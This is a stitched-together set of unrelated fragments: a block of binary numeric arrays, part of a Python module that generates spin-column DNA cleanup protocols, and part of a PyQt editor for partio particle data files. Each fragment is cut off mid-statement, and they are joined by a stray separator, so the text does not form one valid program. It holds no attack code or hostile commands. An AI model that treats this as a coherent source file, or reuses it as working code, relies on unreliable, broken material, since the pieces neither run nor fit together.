[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, | |
<filename>stepwise_mol_bio/spin_cleanup.py
#!/usr/bin/env python3
import stepwise, appcli, autoprop
from inform import warn
from appcli import Key, Method, DocoptConfig
from stepwise import StepwiseConfig, PresetConfig, Quantity, oxford_comma
from stepwise_mol_bio import Cleanup, format_sec
from freezerbox import MakerConfig, group_by_identity, parse_volume_uL, unanimous
from more_itertools import always_iterable
def ng_uL(x):
    """Wrap *x* as a Quantity expressed in ng/µL."""
    return Quantity(x, 'ng/µL')
@autoprop
class SpinCleanup(Cleanup):
"""\
Purify a PCR reaction using a silica spin column.
Usage:
spin_cleanup [<preset>] [-s <µL>] [-d <buffer>] [-v <µL>]
<%! from stepwise_mol_bio import hanging_indent %>\
Arguments:
<preset> [default: ${app.preset}]
The default parameters to use. Typically these correspond to
commercial kits:
${hanging_indent(app.preset_briefs, 8*' ')}
Options:
-s --sample-volume <µL>
The volume of the sample, in µL.
-d --elute-buffer <name>
The buffer to elute in.
-v --elute-volume <µL>
The volume of purified DNA/RNA to elute, in µL. The default value
depends on the preset, but can usually be lowered to get more
concentrated product. A warning will be displayed if the requested
volume is lower than the minimum recommended by the kit manufacturer.
Configuration:
Default values for this protocol can be specified in any of the following
stepwise configuration files:
${hanging_indent(app.config_paths, 8)}
molbio.spin_cleanup.default_preset:
The default value for the `--preset` option.
molbio.spin_cleanup.presets:
Named groups of default reaction parameters. Typically each preset
corresponds to a particular kit or protocol. See below for the various
settings that can be specified in each preset.
molbio.spin_cleanup.presets.<name>.protocol_name
How to refer to the whole protocol. Commonly this is the name of the
spin column kit.
molbio.spin_cleanup.presets.<name>.protocol_link
A link (typically minified) to the complete protocol, e.g. as published
by the manufacturer of the columns. This is not required, but if
specified, will be included in the protocol as a footnote.
molbio.spin_cleanup.presets.<name>.column_name
How to refer to the specific spin column used in the protocol.
molbio.spin_cleanup.presets.<name>.spin_speed_g
How fast to spin the column in each centrifugation step, in units of
g-force.
molbio.spin_cleanup.presets.<name>.column_capacity_ug
The maximum binding capacity of the column, in µg. This information is
added to the protocol as a footnote.
molbio.spin_cleanup.presets.<name>.sample_type
How to generically refer to the sample in the protocol, e.g. "DNA".
molbio.spin_cleanup.presets.<name>.sample_volume_uL
The volume of sample to load on the column, in µL. Alternatively, this
can be a dictionary with keys 'min' and/or 'max' specifying the minimum
and maximum allowed sample volumes, respectively.
molbio.spin_cleanup.presets.<name>.bind_buffer
The name(s) of the buffer(s) to use to bind the sample to column. This
can be either a string or a list of strings. Use a list to specify
that multiple buffers (e.g. binding buffer and ethanol) should be mixed
with the sample before it is loaded on the column. If this option is a
list, the `bind_volume_uL` and `bind_volume_x` options must also be
lists of the same length (or left unspecified).
molbio.spin_cleanup.presets.<name>.bind_volume_uL
How much `bind_buffer` to use, in µL. This can be either a number or a
list of numbers; see `bind_buffer` for more details. This takes
precedence over the `bind_volume_x` setting.
molbio.spin_cleanup.presets.<name>.bind_volume_x
How much `bind_buffer` to use, as a multiple of the sample volume.
This can be a number or a list of numbers; see `bind_buffer` for more
details. This is superseded by the `bind_volume_uL` setting.
molbio.spin_cleanup.presets.<name>.bind_spin_sec
How long to centrifuge the column during the bind step.
molbio.spin_cleanup.presets.<name>.bind_vacuum
Whether or not to use a vacuum manifold for the bind step. The default
is False. If True, the `bind_spin_sec` option is ignored.
molbio.spin_cleanup.presets.<name>.pH_buffer
The name of the buffer to use when adjusting the pH of the sample.
molbio.spin_cleanup.presets.<name>.pH_volume_uL
How much `pH_buffer` to use, in µL. This takes precedence over the
`pH_volume_x` setting.
molbio.spin_cleanup.presets.<name>.pH_volume_x
How much `pH_buffer` to use, as a multiple of the sample volume.
This is superseded by the `pH_volume_uL` setting.
molbio.spin_cleanup.presets.<name>.pH_color
The color the sample/binding buffer should be after reaching the
correct pH.
molbio.spin_cleanup.presets.<name>.wash_buffer
The name of the buffer to use when washing the column. This can either
be a string or a list of strings. Use a list to specify that there
should be multiple wash steps. If this option is a list, the
`wash_volume_uL`, `wash_spin_sec`, and `wash_vacuum` options must also
be lists of the same length (or left unspecified).
molbio.spin_cleanup.presets.<name>.wash_volume_uL
The volume of `wash_buffer` to use, in µL. This can either be a number
or a list of numbers; see `wash_buffer` for more details.
molbio.spin_cleanup.presets.<name>.wash_spin_sec
How long to centrifuge the column during the wash step. This can
either be a number or a list of numbers; see `wash_buffer` for more
details.
molbio.spin_cleanup.presets.<name>.wash_vacuum
Whether or not to use a vacuum manifold for the wash step. This can
either be a boolean or a list of booleans; see `wash_buffer` for more
details. The default is False. If True, the `wash_spin_sec` option is
ignored.
molbio.spin_cleanup.presets.<name>.dry_spin_sec
How long to centrifuge the column after the wash step(s), e.g. to
remove any residual ethanol. If left unspecified, this step will not
be included in the protocol.
molbio.spin_cleanup.presets.<name>.elute_buffer
The default value for the `--elute-buffer` flag.
molbio.spin_cleanup.presets.<name>.elute_volume_uL
The default value for the `--elute-volume` flag.
molbio.spin_cleanup.presets.<name>.elute_min_volume_uL
The minimum recommended volume to elute in. Smaller volumes can still
be specified, but will be accompanied by a warning.
molbio.spin_cleanup.presets.<name>.elute_wait_sec
How long to incubate the column with elution buffer before eluting, in
seconds.
molbio.spin_cleanup.presets.<name>.elute_spin_sec
How long to centrifuge the column when eluting.
Database:
Spin-column cleanup protocols can appear in the "Cleanups" column of a
FreezerBox database:
spin-cleanup [<preset>] [volume=<µL>] [buffer=<name>]
<preset>
See `<preset>`.
volume=<µL>
See `--elute-volume`. Must specify a unit.
buffer=<µL>
See `--elute-buffer`.
"""
__config__ = [
DocoptConfig,
MakerConfig,
PresetConfig,
StepwiseConfig.setup('molbio.spin_cleanup'),
]
preset_briefs = appcli.config_attr()
config_paths = appcli.config_attr()
preset_brief_template = '{protocol_name}'
presets = appcli.param(
Key(StepwiseConfig, 'presets'),
pick=list,
)
preset = appcli.param(
Key(DocoptConfig, '<preset>'),
Key(MakerConfig, 1),
Key(StepwiseConfig, 'default_preset'),
)
protocol_name = appcli.param(
Key(PresetConfig, 'protocol_name'),
)
protocol_link = appcli.param(
Key(PresetConfig, 'protocol_link'),
default=None,
)
column_name = appcli.param(
Key(PresetConfig, 'column_name'),
default='silica spin column',
)
spin_speed_g = appcli.param(
Key(PresetConfig, 'spin_speed_g'),
default=None,
)
column_capacity_ug = appcli.param(
Key(PresetConfig, 'column_capacity_ug'),
default=None,
)
sample_type = appcli.param(
Key(PresetConfig, 'sample_type'),
default='DNA',
)
sample_volume_uL = appcli.param(
Key(DocoptConfig, '--sample-volume', cast=float),
default=None,
)
target_sample_volume_uL = appcli.param(
Key(PresetConfig, 'sample_volume_uL'),
default=None,
)
bind_buffer = appcli.param(
Key(PresetConfig, 'bind_buffer'),
)
bind_volume_uL = appcli.param(
Key(PresetConfig, 'bind_volume_uL'),
default=None
)
bind_volume_x = appcli.param(
Key(PresetConfig, 'bind_volume_x'),
default=None
)
bind_spin_sec = appcli.param(
Key(PresetConfig, 'bind_spin_sec'),
default=None
)
bind_vacuum = appcli.param(
Key(PresetConfig, 'bind_vacuum'),
default=False,
)
ph_buffer = appcli.param(
Key(PresetConfig, 'pH_buffer'),
default=None,
)
ph_volume_uL = appcli.param(
Key(PresetConfig, 'pH_volume_uL'),
default=None
)
ph_volume_x = appcli.param(
Key(PresetConfig, 'pH_volume_x'),
default=None
)
ph_color = appcli.param(
Key(PresetConfig, 'pH_color'),
)
wash_buffer = appcli.param(
Key(PresetConfig, 'wash_buffer'),
)
wash_volume_uL = appcli.param(
Key(PresetConfig, 'wash_volume_uL'),
)
wash_spin_sec = appcli.param(
Key(PresetConfig, 'wash_spin_sec'),
default=None,
)
wash_vacuum = appcli.param(
Key(PresetConfig, 'wash_vacuum'),
default=False,
)
dry_spin_sec = appcli.param(
Key(PresetConfig, 'dry_spin_sec'),
default=None,
)
elute_buffer = appcli.param(
Key(DocoptConfig, '--elute-buffer'),
Key(MakerConfig, 'buffer'),
Key(PresetConfig, 'elute_buffer'),
)
elute_volume_uL = appcli.param(
Key(DocoptConfig, '--elute-volume', cast=float),
Key(MakerConfig, 'volume', cast=parse_volume_uL),
Key(PresetConfig, 'elute_volume_uL'),
)
elute_min_volume_uL = appcli.param(
Key(PresetConfig, 'elute_min_volume_uL'),
default=None,
)
elute_wait_sec = appcli.param(
Key(PresetConfig, 'elute_wait_sec'),
default=None,
)
elute_spin_sec = appcli.param(
Key(PresetConfig, 'elute_spin_sec'),
)
group_by = {
'preset': group_by_identity,
'elute_buffer': group_by_identity,
'elute_volume_uL': group_by_identity,
}
    def __init__(self, preset=None):
        """Optionally override the configured preset at construction time.

        When *preset* is None, the value resolved by the appcli config layers
        (CLI, database, stepwise config) is left untouched.
        """
        if preset is not None:
            self.preset = preset
def get_protocol(self):
p = stepwise.Protocol()
pl = stepwise.paragraph_list()
ul = stepwise.unordered_list()
def break_if_too_long(pl, ul, n=4):
if len(ul) > n:
ul = stepwise.unordered_list()
pl += ul
return ul
footnotes = []
if self.protocol_link:
footnotes.append(self.protocol_link)
if self.column_capacity_ug:
footnotes.append(f"Column capacity: {self.column_capacity_ug} µg")
if self.product_tags and self.show_product_tags:
product_tags = oxford_comma(self.product_tags) + ' '
else:
product_tags = ''
p += pl
pl += f"Purify {product_tags}using {self.protocol_name}{p.add_footnotes(*footnotes)}:"
pl += ul
if self.spin_speed_g:
ul += f"Perform all spin steps at {self.spin_speed_g}g."
## Dilute
if x := self.target_sample_volume_uL:
v = self.sample_volume_uL
if not isinstance(x, dict):
target = f'{x} µL'
skip = v and v == x
self.sample_volume_uL = x
elif 'min' in x and 'max' in x:
target = f"between {x['min']}–{x['max']} µL"
skip = v and x['min'] <= v <= x['max']
elif 'min' in x:
target = f"at least {x['min']} µL"
skip = v | |
primary widget for table entries representing a particle attribute """
widgetNumber = 0
    def __init__(self, value, data, attr, particleNum, numColumns, parent=None):
        """Build a grid of editable numeric cells for one attribute value.

        *value* is a tuple of numbers laid out over *numColumns* columns
        (e.g. 4 columns for a 16-element matrix). *particleNum* < 0 denotes
        a fixed (per-file) attribute rather than a per-particle one.
        """
        QWidget.__init__(self, parent)
        self.value = value
        self.data = data
        self.attr = attr
        self.particleNum = particleNum
        # NOTE(review): setFrameShape is a QFrame method — presumably the
        # (unseen) class header derives from QFrame; confirm.
        self.setFrameShape(QFrame.NoFrame)
        # Unique object name per instance so the per-widget stylesheet
        # selectors below target only this widget.
        self.name = 'AttrWidget{}'.format(AttrWidget.widgetNumber)
        self.setObjectName(self.name)
        AttrWidget.widgetNumber += 1
        self.withBorderStyle = '#%s {border: 1px solid dodgerblue;}' % self.name
        self.noBorderStyle = '#%s {border: 0px;}' % self.name
        self.setStyleSheet(self.noBorderStyle)
        layout = QVBoxLayout()
        layout.setContentsMargins(0,0,0,0)
        self.setLayout(layout)
        idx = 0
        self.items = []       # one NumericalEdit per component of value
        self.textValues = []  # original text of each cell, for change detection
        # Enough rows to hold len(value) cells at numColumns per row.
        numRows = int(math.ceil(len(value) / float(numColumns)))
        for _ in range(numRows):
            row = QHBoxLayout()
            layout.addLayout(row)
            for _ in range(numColumns):
                item = NumericalEdit(value[idx])
                self.textValues.append(str(value[idx]))
                item.editingFinished.connect(self.applyEdit)
                row.addWidget(item, Qt.AlignHCenter|Qt.AlignTop)
                self.items.append(item)
                idx += 1
                if idx == len(self.value):
                    # Last (possibly partial) row filled.
                    break
#--------------------------------------------------------------------------
    def applyEdit(self):
        """ Callback when editing finished on a cell. Sets data value.

        Rebuilds the whole tuple from every cell's text, and only writes it
        back to the data model when at least one cell's text changed.
        The element type (int vs float) follows the first component of the
        original value.
        """
        newValue = []
        changed = False
        for i, item in enumerate(self.items):
            text = item.text()
            # NOTE(review): textValues is not refreshed after a successful
            # edit, so 'changed' compares against the initial values — an
            # edit back to the original text registers as unchanged; confirm
            # this is intended.
            if text != self.textValues[i]:
                changed = True
            if isinstance(self.value[0], int):
                newValue.append(int(text))
            else:
                newValue.append(float(text))
            item.clearFocus()
        if changed:
            self.value = tuple(newValue)
            if self.particleNum >= 0:
                self.data.set(self.attr, self.particleNum, self.value)
            else:
                # particleNum < 0 means this is a fixed (per-file) attribute.
                self.data.setFixed(self.attr, self.value)
            # Highlight the widget to show it holds an edited value.
            self.drawBorder(True)
#--------------------------------------------------------------------------
def drawBorder(self, border):
""" Sets or clears the border around the frame """
if border:
self.setStyleSheet(self.withBorderStyle)
else:
self.setStyleSheet(self.noBorderStyle)
#------------------------------------------------------------------------------
def getWidget(value, data, attr, particleNum=-1):
    """ Returns the correct type of QWidget based off of the item type.
    A particleNum<0 means a fixed attribute.
    """
    if not isinstance(value, tuple):
        return QLabel(str(value))
    # 16- and 9-element tuples are shown as 4x4 / 3x3 grids; any other
    # tuple goes on a single row (one column per component).
    columns = {16: 4, 9: 3}.get(len(value), len(value))
    return AttrWidget(value, data, attr, particleNum, columns)
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
class ParticleTableWidget(QTableWidget): # pylint:disable=R0903
""" A QTableWidget interfacing with ParticleData"""
    def __init__(self, data, parent=None):
        """Create the table and bind it to the ParticleData model *data*."""
        QTableWidget.__init__(self, parent)
        self.data = data
        # Connect data signals to my slots so the table tracks model changes.
        self.data.particleAdded.connect(self.particleAddedSlot)
        self.data.attributeAdded.connect(self.attributeAddedSlot)
        self.data.dataReset.connect(self.dataResetSlot)
        self.data.dirtied.connect(self.dataDirtiedSlot)
        style = 'QTableWidget::item { border: 1px solid gray; }'
        self.setStyleSheet(style)
        # When True, slots return immediately (used while rebuilding the
        # table to avoid reacting to our own modifications).
        self.ignoreSignals = False
        self.populate()
#--------------------------------------------------------------------------
    def populate(self):
        """ Populate the table with the data

        Rebuilds headers (one column per attribute, with a tooltip showing
        name/type/count) and one row per particle, then resizes sections to
        fit their contents.
        """
        self.clear()
        numAttr = self.data.numAttributes()
        numParticles = self.data.numParticles()
        # NOTE(review): numAttributes and attributeInfo are passed as bound
        # methods (not called) — presumably getAttrs invokes them; confirm.
        self.attrs = getAttrs(self.data.numAttributes, self.data.attributeInfo, True)
        self.setColumnCount(numAttr)
        self.setRowCount(numParticles)
        self.horizontalHeader().setSectionResizeMode(QHeaderView.Interactive)
        for col, (_, attr) in enumerate(self.attrs):
            item = QTableWidgetItem(attr.name)
            tooltip = '<p><tt> Name: {}<br> Type: {}<br>Count: {}</tt></p>'.\
                      format(attr.name, partio.TypeName(attr.type), attr.count)
            item.setToolTip(tooltip)
            self.setHorizontalHeaderItem(col, item)
        self.horizontalHeader().setStretchLastSection(False)
        # Row headers are simply the particle numbers.
        self.setVerticalHeaderLabels([str(pnum) for pnum in range(numParticles)])
        self.setTabKeyNavigation(True)
        self.horizontalHeader().setSectionsMovable(False)
        # Populate it with the particle data
        self.widgets = []
        for pnum in range(numParticles):
            self.populateParticle(pnum)
        self.horizontalHeader().resizeSections(QHeaderView.ResizeToContents)
        self.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#--------------------------------------------------------------------------
def populateParticle(self, pnum, border=False):
""" Populates the table with a new particle - a full row """
for col, (_, attr) in enumerate(self.attrs):
self.populateAttribute(pnum, col, attr, border)
#--------------------------------------------------------------------------
def populateAttribute(self, pnum, col, attr, border=False):
""" Populates a single cell in the table """
value = self.data.get(attr, pnum)
widget = getWidget(value, self.data, attr, pnum)
if border:
widget.drawBorder(border)
self.setCellWidget(pnum, col, widget)
self.widgets.append(widget)
#--------------------------------------------------------------------------
def keyPressEvent(self, event):
""" Handles certain keys """
if event.key() in (Qt.Key_Delete, Qt.Key_Backspace):
self.handleDeleteKey(event)
else:
QTableWidget.keyPressEvent(self, event)
#--------------------------------------------------------------------------
def handleDeleteKey(self, event): # pylint:disable=W0613
""" Handles the delete or backspace key """
model = self.selectionModel()
rows = model.selectedRows()
columns = model.selectedColumns()
if not rows and not columns:
return
# Ignore signals as we rebuild
self.ignoreSignals = True
if rows:
particles = [row.row() for row in rows]
self.data.removeParticles(particles)
if columns:
indices = [col.column() for col in columns]
attributes = [str(self.horizontalHeaderItem(index).text()) for index in indices]
self.data.removeAttributes(attributes)
self.ignoreSignals = False
self.dataResetSlot()
#--------------------------------------------------------------------------
def particleAddedSlot(self, index): # pylint:disable=W0613
""" SLOT when a particle is added """
if self.ignoreSignals:
return
numParticles = self.data.numParticles()
self.setRowCount(numParticles)
self.populateParticle(numParticles-1, True)
self.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#--------------------------------------------------------------------------
def attributeAddedSlot(self, name): # pylint:disable=W0613
""" SLOT when attribute is added """
numAttrs = self.data.numAttributes()
anum = numAttrs - 1
name = str(name) # partio doesn't like unicode
attr = self.data.attributeInfo(name)
self.attrs.append((anum, attr))
self.setColumnCount(numAttrs)
self.setHorizontalHeaderItem(numAttrs-1, QTableWidgetItem(attr.name))
for pnum in range(self.data.numParticles()):
self.populateAttribute(pnum, anum, attr, True)
self.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#--------------------------------------------------------------------------
def dataResetSlot(self):
""" SLOT when particle data is reconstructed """
if not self.ignoreSignals:
self.populate()
#--------------------------------------------------------------------------
def dataDirtiedSlot(self, dirty):
""" SLOT when the particle data is dirtied or cleaned.
When cleaned, reset the style sheets on widgets for border.
"""
if not dirty:
for widget in self.widgets:
widget.drawBorder(False)
#------------------------------------------------------------------------------
class FixedAttributesWidget(QWidget):
    """ A widget for viewing/editing fixed attributes (non-varying).

    Shows a one-column table with a row per fixed attribute; each cell is an
    editor widget from getWidget(). When the particle set has no fixed
    attributes, the table is hidden and a placeholder label is shown instead.
    """
    def __init__(self, data, parent=None):
        # data: the ParticleData model this panel views and edits.
        QWidget.__init__(self, parent)
        self.data = data
        vbox = QVBoxLayout()
        self.setLayout(vbox)
        title = QLabel('Fixed Attributes')
        vbox.addWidget(title)
        # Sunken frame visually groups the table/placeholder under the title.
        self.frame = QFrame()
        vbox.addWidget(self.frame)
        self.vbox = QVBoxLayout()
        self.frame.setLayout(self.vbox)
        self.frame.setFrameShape(QFrame.Panel)
        self.frame.setFrameShadow(QFrame.Sunken)
        self.table = QTableWidget()
        self.table.horizontalHeader().hide()
        self.vbox.addWidget(self.table)
        # Exactly one of table / noAttrLabel is visible; populate() decides.
        self.table.hide()
        self.noAttrLabel = QLabel('<i>No fixed attributes</i>')
        self.vbox.addWidget(self.noAttrLabel)
        self.widgets = []
        self.populate()
        # Connect after the initial populate so it doesn't run twice.
        self.data.fixedAttributeAdded.connect(self.fixedAttributeAddedSlot)
        self.data.dataReset.connect(self.dataResetSlot)
        self.data.dirtied.connect(self.dataDirtiedSlot)
    def dataDirtiedSlot(self, dirty):
        """ SLOT when the particle data is dirtied or cleaned."""
        # On clean (save), clear the "unsaved" borders from all editors.
        if not dirty:
            for widget in self.widgets:
                widget.drawBorder(False)
    def dataResetSlot(self):
        """ SLOT when particle data is reconstructed """
        self.populate()
    def fixedAttributeAddedSlot(self, name): #pylint:disable=W0613
        """ SLOT when a fixed attribute is added to the particle set """
        self.populate()
    def populate(self):
        """ Populates the table of fixed attributes """
        self.widgets = []
        # If no widgets, just drop that in
        numAttrs = self.data.numFixedAttributes()
        if not numAttrs:
            self.table.hide()
            self.noAttrLabel.show()
            return
        self.table.show()
        self.noAttrLabel.hide()
        self.table.setColumnCount(1)
        self.table.setRowCount(numAttrs)
        # getAttrs receives the count/info accessors (not their results);
        # presumably it returns (index, attribute) pairs -- TODO confirm.
        self.attrs = getAttrs(self.data.numFixedAttributes, self.data.fixedAttributeInfo, True)
        for row, (_, attr) in enumerate(self.attrs):
            item = QTableWidgetItem(attr.name)
            tooltip = '<p><tt> Name: {}<br> Type: {}<br>Count: {}</tt></p>'.\
                format(attr.name, partio.TypeName(attr.type), attr.count)
            item.setToolTip(tooltip)
            self.table.setVerticalHeaderItem(row, item)
            value = self.data.getFixed(attr)
            widget = getWidget(value, self.data, attr)
            self.table.setCellWidget(row, 0, widget)
            self.widgets.append(widget)
        self.table.horizontalHeader().setStretchLastSection(False)
        self.table.setTabKeyNavigation(True)
        self.table.horizontalHeader().setSectionsMovable(False)
        self.table.horizontalHeader().resizeSections(QHeaderView.ResizeToContents)
        self.table.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
class IndexedStringsWidget(QWidget):
    """ Holds the list of indexed string attributes.

    For every INDEXEDSTR attribute, shows a nested read-only table mapping
    each string index to its string value. When no such attributes exist,
    a placeholder label is shown instead of the table.
    """
    def __init__(self, data, parent=None):
        # data: the ParticleData model this panel views.
        QWidget.__init__(self, parent)
        self.data = data
        vbox = QVBoxLayout()
        self.setLayout(vbox)
        title = QLabel('Indexed Strings')
        vbox.addWidget(title)
        # Sunken frame visually groups the table/placeholder under the title.
        self.frame = QFrame()
        vbox.addWidget(self.frame)
        self.vbox = QVBoxLayout()
        self.frame.setLayout(self.vbox)
        self.frame.setFrameShape(QFrame.Panel)
        self.frame.setFrameShadow(QFrame.Sunken)
        self.table = QTableWidget()
        self.table.horizontalHeader().hide()
        self.vbox.addWidget(self.table)
        # Exactly one of table / noStringsLabel is visible; populate() decides.
        self.table.hide()
        self.noStringsLabel = QLabel('<i>No indexed strings</i>')
        self.vbox.addWidget(self.noStringsLabel)
        self.widgets = []
        self.populate()
        # Connect after the initial populate so it doesn't run twice.
        self.data.attributeAdded.connect(self.attributeAddedSlot)
        self.data.dataReset.connect(self.dataResetSlot)
        self.data.dirtied.connect(self.dataDirtiedSlot)
    def dataDirtiedSlot(self, dirty):
        """ SLOT when the particle data is dirtied or cleaned."""
        # On clean (save), clear the "unsaved" borders from all widgets.
        if not dirty:
            for widget in self.widgets:
                widget.drawBorder(False)
    def dataResetSlot(self):
        """ SLOT when particle data is reconstructed """
        self.populate()
    def attributeAddedSlot(self, name): #pylint:disable=W0613
        """ SLOT when an attribute is added to the particle set """
        # Only rebuild if the new attribute actually is an indexed string.
        attr = self.data.attributeInfo(name)
        if attr.type == partio.INDEXEDSTR:
            self.populate()
    def populate(self):
        """ Populates the table of indexed strings """
        self.widgets = []
        # If no widgets, just drop that in
        attrs = []
        for anum in range(self.data.numAttributes()):
            attr = self.data.attributeInfo(anum)
            if attr.type == partio.INDEXEDSTR:
                attrs.append(attr)
        if not attrs:
            self.table.hide()
            self.noStringsLabel.show()
            return
        self.table.show()
        self.noStringsLabel.hide()
        self.table.setColumnCount(1)
        self.table.setRowCount(len(attrs))
        # One outer row per INDEXEDSTR attribute; the cell holds a nested
        # table of index -> string for that attribute.
        for row, attr in enumerate(attrs):
            item = QTableWidgetItem(attr.name)
            self.table.setVerticalHeaderItem(row, item)
            strings = self.data.indexedStrs(attr)
            table = QTableWidget()
            table.setColumnCount(1)
            table.setRowCount(len(strings))
            table.horizontalHeader().hide()
            table.setVerticalHeaderLabels([str(i) for i in range(len(strings))])
            for i, string in enumerate(strings):
                widget = QLabel(string)
                table.setCellWidget(i, 0, widget)
                self.widgets.append(widget)
            self.table.setCellWidget(row, 0, table)
        self.table.horizontalHeader().setStretchLastSection(False)
        self.table.setTabKeyNavigation(True)
        self.table.horizontalHeader().setSectionsMovable(False)
        self.table.horizontalHeader().resizeSections(QHeaderView.ResizeToContents)
        self.table.verticalHeader().resizeSections(QHeaderView.ResizeToContents)
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
class PartEdit(QMainWindow):
""" Main window / editor """
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.data = ParticleData()
toolbar = self.addToolBar("Test")
openButton = QPushButton("")
openButton.setFlat(True)
openButton.setIconSize( QSize(32, 32) )
openButton.setIcon(QIcon("/jobs2/soft/icons/dlight/open.png"))
openButton.setToolTip( "Open File" )
toolbar.addWidget(openButton)
openButton.clicked.connect(self.openSlot)
QShortcut( QKeySequence(Qt.CTRL + Qt.Key_O), self, self.openSlot )
saveButton = QPushButton("")
saveButton.setFlat(True)
saveButton.setIconSize( QSize(32, 32) )
saveButton.setIcon(QIcon("/jobs2/soft/icons/dlight/file_save.png"))
saveButton.setToolTip( "Save File" )
toolbar.addWidget(saveButton)
saveButton.clicked.connect(self.saveSlot)
QShortcut( QKeySequence(Qt.CTRL + Qt.Key_S), self, self.saveSlot )
saveDeltaButton = QPushButton("")
saveDeltaButton.setFlat(True)
saveDeltaButton.setIconSize( QSize(32, 32) )
saveDeltaButton.setIcon(QIcon("/jobs2/soft/icons/dlight/file_save_as.png"))
saveDeltaButton.setToolTip( "Save File As Delta" )
toolbar.addWidget(saveDeltaButton)
saveDeltaButton.clicked.connect(self.saveDeltaSlot)
QShortcut( QKeySequence(Qt.CTRL + Qt.SHIFT + Qt.Key_S), self, self.saveDeltaSlot )
addParticleButton = QPushButton("Particle")
addParticleButton.setFlat(True)
addParticleButton.setIconSize( QSize(32, 32) )
addParticleButton.setIcon(QIcon("/jobs2/soft/icons/shared/plus.png"))
addParticleButton.setToolTip( "Add Particle" )
toolbar.addWidget(addParticleButton)
addParticleButton.clicked.connect(self.addParticleSlot)
addAttributeButton = QPushButton("Attribute")
addAttributeButton.setFlat(True)
addAttributeButton.setIconSize( QSize(32, 32) )
addAttributeButton.setIcon(QIcon("/jobs2/soft/icons/shared/plus.png"))
addAttributeButton.setToolTip( "Add Attribute" )
toolbar.addWidget(addAttributeButton)
addAttributeButton.clicked.connect(self.addAttributeSlot)
splitter = QSplitter(self)
